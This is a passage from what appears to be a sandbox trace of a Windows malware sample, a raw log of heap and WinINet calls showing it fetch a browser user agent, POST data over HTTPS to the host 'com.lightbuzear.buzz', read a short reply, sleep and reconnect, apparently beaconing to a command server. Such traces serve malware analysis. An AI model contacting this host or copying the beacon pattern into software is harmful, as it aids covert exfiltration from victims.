lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0176.320] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0ae8 [0176.320] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09b0 | out: hHeap=0x4780000) returned 1 [0176.320] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0176.320] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0ae8 | out: hHeap=0x4780000) returned 1 [0176.320] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f6a0 [0176.320] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0176.320] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0176.320] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6a0 | out: hHeap=0x4780000) returned 1 [0176.320] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6a0 [0176.320] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0176.320] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6c8 [0176.320] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0176.320] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0176.321] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0176.321] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0176.321] FreeLibrary (hLibModule=0x71780000) returned 1 [0176.321] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6c8 | out: hHeap=0x4780000) returned 1 [0176.321] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0176.321] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6c8 [0176.321] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0176.322] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0176.322] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0176.322] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0176.322] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0176.322] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0176.322] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0176.322] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0176.322] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6b0 [0176.322] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0176.322] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0ae8 [0176.322] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0176.322] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0830 [0176.322] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0ae8 | out: hHeap=0x4780000) returned 1 [0176.322] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0176.322] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0830 | out: hHeap=0x4780000) returned 1 [0176.322] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0aa0 [0176.322] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6f0 [0176.322] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6f0 | out: hHeap=0x4780000) returned 1 [0176.322] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0176.322] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6f0 [0176.322] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0176.323] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3d0 [0176.323] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0176.323] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6d0 [0176.323] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0176.323] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0176.323] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0176.323] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0176.323] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0176.323] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0176.323] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0176.323] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f09b0 [0176.323] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0176.323] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f0908 [0176.323] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09b0 | out: hHeap=0x4780000) returned 1 [0176.323] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0176.323] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0908 | out: hHeap=0x4780000) returned 1 [0176.323] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0908 [0176.323] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3f8 [0176.323] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3f8 | out: hHeap=0x4780000) returned 1 [0176.324] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0176.324] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0176.324] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0176.324] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0176.324] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0176.324] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6d0 [0176.324] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0176.324] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0176.324] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0176.324] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0176.324] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0176.325] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0a58 [0176.325] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0176.325] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f09b0 [0176.325] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0a58 | out: hHeap=0x4780000) returned 1 [0176.325] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0176.325] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09b0 | out: hHeap=0x4780000) returned 1 [0176.325] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f3f8 [0176.325] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0176.325] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbe80 [0176.325] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3f8 | out: hHeap=0x4780000) returned 1 [0176.325] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f2e0 [0176.325] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0176.325] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f1a0 [0176.325] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0176.326] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0176.326] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0176.326] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0176.326] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f1a0 | out: hHeap=0x4780000) returned 1 [0176.326] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce740 [0176.326] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce610 [0176.326] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0176.326] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0176.326] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0176.326] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce610 [0176.326] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0176.326] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce680 [0176.326] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0176.327] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f09b0 [0176.327] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0176.327] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f09c8 [0176.327] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09b0 | out: hHeap=0x4780000) returned 1 [0176.327] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0176.327] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09c8 | out: hHeap=0x4780000) returned 1 [0176.327] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f060 [0176.327] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0176.327] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0176.327] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f060 | out: hHeap=0x4780000) returned 1 [0176.327] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f3f8 [0176.327] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0176.327] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f448 [0176.327] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0176.327] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0176.328] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0176.328] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0177.754] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f448 | out: hHeap=0x4780000) returned 1 [0177.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0177.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0177.754] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0177.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0177.754] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0177.754] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0177.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0177.755] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0177.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0177.755] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0177.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0177.755] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0177.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f09b0 [0177.755] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0177.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f09c8 [0177.755] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09b0 | out: hHeap=0x4780000) returned 1 [0177.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0177.755] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09c8 | out: hHeap=0x4780000) returned 1 [0177.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f218 [0177.755] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0177.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0177.755] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f218 | out: hHeap=0x4780000) returned 1 [0177.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f060 [0177.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0177.755] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f268 [0177.756] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0177.756] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0177.756] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0177.756] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0177.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f268 | out: hHeap=0x4780000) returned 1 [0177.757] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0177.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0177.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0177.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0177.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0177.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0177.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce630 [0177.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0177.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0177.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0177.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f09b0 [0177.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0177.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f09c8 [0177.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09b0 | out: hHeap=0x4780000) returned 1 [0177.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0177.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09c8 | out: hHeap=0x4780000) returned 1 [0177.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f420 [0177.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0177.757] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0177.757] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f420 | out: hHeap=0x4780000) returned 1 [0177.758] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f308 [0177.758] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbe80 [0177.758] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f240 [0177.758] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbe80 | out: hHeap=0x4780000) returned 1 [0177.758] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0177.759] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0177.759] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0177.759] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f240 | out: hHeap=0x4780000) returned 1 [0177.759] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0177.759] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0177.759] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0177.759] FreeLibrary (hLibModule=0x71570000) returned 1 [0177.759] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0177.759] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0177.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f3d0 | out: hHeap=0x4780000) returned 1 [0177.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6f0 | out: hHeap=0x4780000) returned 1 [0177.760] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6c8 | out: hHeap=0x4780000) returned 1 [0177.761] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0177.761] Sleep (dwMilliseconds=0x2710) [0177.818] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0177.818] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0177.818] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0177.819] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0177.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0177.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0177.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0177.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce630 [0177.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0177.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0ae8 [0177.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0177.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f09b0 [0177.828] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0ae8 | out: hHeap=0x4780000) returned 1 [0177.828] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0177.829] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09b0 | out: hHeap=0x4780000) returned 1 [0177.829] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x47f0830 [0177.829] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0177.829] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f5b0 | out: hHeap=0x4780000) returned 1 [0177.829] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0177.829] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f5b0 [0177.829] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0177.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0177.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0177.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0177.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0177.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0177.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0177.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0177.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce750 [0177.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0177.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x47f0ae8 [0177.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0177.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x47f09b0 [0177.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f0ae8 | out: hHeap=0x4780000) returned 1 [0177.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0177.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47f09b0 | out: hHeap=0x4780000) returned 1 [0177.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x481f6c8 [0177.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0177.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba90 [0177.830] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6c8 | out: hHeap=0x4780000) returned 1 [0177.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6c8 [0177.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba58 [0177.830] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6f0 [0177.831] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0177.831] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0177.831] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0177.832] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0177.832] FreeLibrary (hLibModule=0x71780000) returned 1 [0177.832] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x481f6f0 | out: hHeap=0x4780000) returned 1 [0177.832] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0177.832] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x481f6f0 [0177.832] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) 